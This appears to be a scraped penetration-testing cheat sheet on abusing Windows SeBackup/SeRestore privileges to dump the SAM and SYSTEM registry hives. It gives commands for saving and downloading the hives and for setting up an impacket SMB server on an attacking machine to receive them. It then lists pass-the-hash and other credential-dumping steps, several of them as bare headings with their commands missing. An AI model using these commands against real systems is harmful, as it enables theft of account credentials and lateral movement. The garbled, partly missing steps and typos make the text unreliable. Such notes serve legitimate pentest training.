Dump SAM and SYSTEM hives
Privileges: SeBackup/SeRestore
1: Backup SAM and SYSTEM hashes
cd /
mkdir temp
cd temp
req save hklm\system c:\temp\system
req save hklm\sam c:\temp\sam
download sam
download system2: Create SMB Server on attacking machine
mkdir share
impacket-smbserver -smb2support -username USER -password PASSWORD public share3: Copy backups to share folder
4: Retrieve hashes
OR
5: Pass-The-Hash Attack (PtH)
TIP: We can also use evil-winrm for PtH attacks.
Alternate Method to transfer the Hives: reg.py remotely on Linux
Alternate Method: SeBackupPrivilegeUtils https://github.com/giuliano108/SeBackupPrivilege
Usage:
Alternate Method: Robocopy
Alternate Method: diskshadow.exe
Create a script for diskshadow to execute
Copy the SAM/SYSTEM/SECURITY hives to our temp folder
Then download all of them to our machine
Dump hashes
1) Pypykatz
2) impacket-secretsdump
Last updated